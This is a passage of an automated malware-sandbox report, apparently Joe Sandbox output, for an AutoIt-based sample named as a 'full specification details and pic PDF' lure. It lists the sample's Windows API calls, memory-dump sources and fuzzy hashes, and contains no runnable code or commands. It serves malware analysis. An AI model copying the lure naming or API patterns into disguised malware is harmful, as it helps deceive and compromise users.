                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00398AFF
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398B16
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      APIs
                                        • Part of subcall function 00381E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381E77
                                        • Part of subcall function 00381E68: lstrcpyW.KERNEL32(00000000,?,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00381E9D
                                        • Part of subcall function 00381E68: lstrcmpiW.KERNEL32(00000000,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381ECE
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AD4
                                      • lstrcpyW.KERNEL32(00000000,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AFA
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380B2E
                                      Strings
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003805AC
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003805C7
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003805DD
                                      • FreeLibrary.KERNEL32(?), ref: 00380632
                                      Similarity
                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                      • String ID:
                                      • API String ID: 3137044355-0
                                      APIs
                                        • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                        • Part of subcall function 0037AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                        • Part of subcall function 0037AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                        • Part of subcall function 0037AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                        • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                      • GetLengthSid.ADVAPI32(?,00000000,0037ADE4,?,?), ref: 0037B21B
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0037B227
                                      • HeapAlloc.KERNEL32(00000000), ref: 0037B22E
                                      • CopySid.ADVAPI32(?,00000000,?), ref: 0037B247
                                      Similarity
                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                      • String ID:
                                      • API String ID: 4217664535-0
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0037B498
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4AA
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4C0
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4DB
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                      • GetClientRect.USER32(?,?), ref: 003BE69A
                                      • GetCursorPos.USER32(?), ref: 003BE6A4
                                      • ScreenToClient.USER32(?,?), ref: 003BE6AF
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00387352
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00387385
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0038739B
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003873A2
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                      • GetStockObject.GDI32(00000011), ref: 0035D1CE
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00372E17
                                      • GetCurrentThreadId.KERNEL32 ref: 00372E26
                                      • GetCurrentProcessId.KERNEL32 ref: 00372E2F
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00372E3C
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      APIs
                                        • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                        • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEA8E
                                      • LineTo.GDI32(00000000,?,?), ref: 003AEA9B
                                      • EndPath.GDI32(00000000), ref: 003AEAAB
                                      • StrokePath.GDI32(00000000), ref: 003AEAB9
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                      • GetCurrentThreadId.KERNEL32 ref: 0037C864
                                      • AttachThreadInput.USER32(00000000), ref: 0037C86B
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 0037B0D6
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0DD
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0037AC9D), ref: 0037B0EA
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0F1
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0035B496
                                      • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                      • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                      • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                      • GetWindowDC.USER32(?,00000000), ref: 003BDE2B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 003BDE38
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 003BDE51
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 003BDE6A
                                      • GetPixel.GDI32(00000000,?,?), ref: 003BDE8A
                                      • ReleaseDC.USER32(?,00000000), ref: 003BDE95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                      • Instruction ID: 1689fb2547e4c7141857f156102d7b75c99c41916cf0784316a7aaf4e53e3343
                                      • Opcode Fuzzy Hash: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                      • Instruction Fuzzy Hash: 30E06D31100240AFDF231B64AC09FD87B15AB1233AF04C226FBA9980E1C7719580CB11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                      • Instruction ID: df33ad8a3a4eab4ab9e9d3e3e94c5273caec0617b04fb07e5605059e06e74d24
                                      • Opcode Fuzzy Hash: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                      • Instruction Fuzzy Hash: 76E01AB1100204EFDB025F709848E6E7BACEB4C355F118825FD9ACB221CB75A8409B40
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037B2DF
                                      • UnloadUserProfile.USERENV(?,?), ref: 0037B2EB
                                      • CloseHandle.KERNEL32(?), ref: 0037B2F4
                                      • CloseHandle.KERNEL32(?), ref: 0037B2FC
                                        • Part of subcall function 0037AB24: GetProcessHeap.KERNEL32(00000000,?,0037A848), ref: 0037AB2B
                                        • Part of subcall function 0037AB24: HeapFree.KERNEL32(00000000), ref: 0037AB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                      • Instruction ID: 38eacd0ce628d480388eaae9e7e9039930095baad2c9deef7950416482dc1b81
                                      • Opcode Fuzzy Hash: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                      • Instruction Fuzzy Hash: 36E0263A104405BBDB026FA5EC08C59FBAAFF993217108631F625C15B5CB36B871EB91
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                      • Instruction ID: 55cd22d27efabb7015a962392549f67b402dc50ae1bd761079e4d0ebd1d028d2
                                      • Opcode Fuzzy Hash: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                      • Instruction Fuzzy Hash: 51E012B1500200AFDB025F709848A297BA8EB4C355F118829FD9ACB221CB79A840CB00
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0037DEAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                      • Instruction ID: bf3732f05c99c679e314c52ed655088ab0d490a94d1d8bb91616bbeb2c173290
                                      • Opcode Fuzzy Hash: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                      • Instruction Fuzzy Hash: E7913674600601AFDB26DF64C884E6AB7B9AF48710B14846EF94ACF691DB75E841CB60
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0035BCDA
                                      • GlobalMemoryStatusEx.KERNEL32 ref: 0035BCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                      • Instruction ID: 75dbea775128eac3cda09baf4ac5d15af68d362fcaaa98dfab1b604933904097
                                      • Opcode Fuzzy Hash: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                      • Instruction Fuzzy Hash: E8513071408B449BE321AF14D886FABBBECFB95355F41484EF5C8821B2EB7084ACC756
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 003AA85A
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003AA86F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                      • Instruction ID: cb096f471f8fd1662aae4099965fdb7bfc376ea4f7072a64013e3c241f44a7b1
                                      • Opcode Fuzzy Hash: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                      • Instruction Fuzzy Hash: EC410775E017099FDB55CFA8C880BEA7BB9FB09300F11016AE905EB391D775A942CFA1
                                      APIs
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003951C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CrackInternet
                                      • String ID: |$D9
                                      • API String ID: 1381609488-3281666953
                                      • Opcode ID: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                      • Instruction ID: 5eacfabc5bd0c5773d876d6a6b8d7ddf623ef35c6728153f3a2c8b7a4cbf174c
                                      • Opcode Fuzzy Hash: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                      • Instruction Fuzzy Hash: 13313B71C11119ABCF42EFE4CC85AEE7FB9FF14710F100019F915AA166DB71AA46DBA0
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 003A980E
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003A984A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: 1777d0e92e4137c45a1bc42f2bac697e2daa6f5dddcf3ae1ef48b1e7e225e1cd
                                      • Instruction ID: 6d61365def4418526b220d198d2e039eb885eadc718959cdd40630c2a9a31ea9
                                      • Opcode Fuzzy Hash: 1777d0e92e4137c45a1bc42f2bac697e2daa6f5dddcf3ae1ef48b1e7e225e1cd
                                      • Instruction Fuzzy Hash: F7317C71110604AAEB129F78CC80FFB77ADFF5A760F11861AF9A9D7190CA35AC81C760
                                      APIs
                                        • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(003FA0D0,00000FA0,003F6EA8,00000010,00363503,003F6BB0,0000000C,003634A9,?,003EEEF4,00000040,?,003441C8,00000001,003EEEF4), ref: 0036E580
                                      • EnterCriticalSection.KERNEL32(003FA0D0,?,003441C8,00000001,003EEEF4,?,?,?,?,003439FE,?,00000001), ref: 0036E592
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Enter$CountInitializeSpin
                                      • String ID: "@
                                      • API String ID: 3238990206-895456044
                                      • Opcode ID: b04b9b1f339c0bf326263e8c23e442081273f836d84ecd653e96784ba2bb943e
                                      • Instruction ID: 79aa41de4a1fe053e2eb41c6e7512147fc523e30c80f3849ef133b0e0ac77e3d
                                      • Opcode Fuzzy Hash: b04b9b1f339c0bf326263e8c23e442081273f836d84ecd653e96784ba2bb943e
                                      • Instruction Fuzzy Hash: C731CD799047018FC722CFADC985A19B7E4BF09324B09C16EE955EB2E5DBB0E8048F44
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A945C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A9467
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                      • Instruction ID: c1f912d311ef5a5e1c44edf510da18047ca04ef74ee43711da1878ead34d7a52
                                      • Opcode Fuzzy Hash: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                      • Instruction Fuzzy Hash: 4711B6713001086FEF12DE55DC80FBB376EEB4A3A4F110126F914AB2E0D6359C528760
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • GetActiveWindow.USER32 ref: 003ADA7B
                                      • EnumChildWindows.USER32(?,003AD75F,00000000), ref: 003ADAF5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ActiveChildEnumLongWindows
                                      • String ID: T19
                                      • API String ID: 3814560230-229429444
                                      • Opcode ID: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                      • Instruction ID: 1d0575a093b9042e3b146d6f59bf858af23ee004953e046d3f54da22c2989389
                                      • Opcode Fuzzy Hash: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                      • Instruction Fuzzy Hash: A7212F75204201DFC716DF28D950AA5B7E9EF5A320F250A29F966977F0DB31A800CF64
                                      APIs
                                        • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                        • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                        • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      • GetWindowRect.USER32(00000000,?), ref: 003A9968
                                      • GetSysColor.USER32(00000012), ref: 003A9982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                      • Instruction ID: f87fb799bb2250212c0d4ba5728531e7088ae941c902c3059e41511c7f38cd7a
                                      • Opcode Fuzzy Hash: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                      • Instruction Fuzzy Hash: 26112672520209AFDB16DFB8CC45EEA7BA8FB09344F014A2DF955E2250E735E851DB60
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 003A9699
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A96A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 06e5565cf3a252fd789d934dd5a3827818b01eaa6bc15c61be8b8fc033078a21
                                      • Instruction ID: 231b6ba8f42e42a62d55792bfb258a699e93681c298f285b116eb2b9f6ce7351
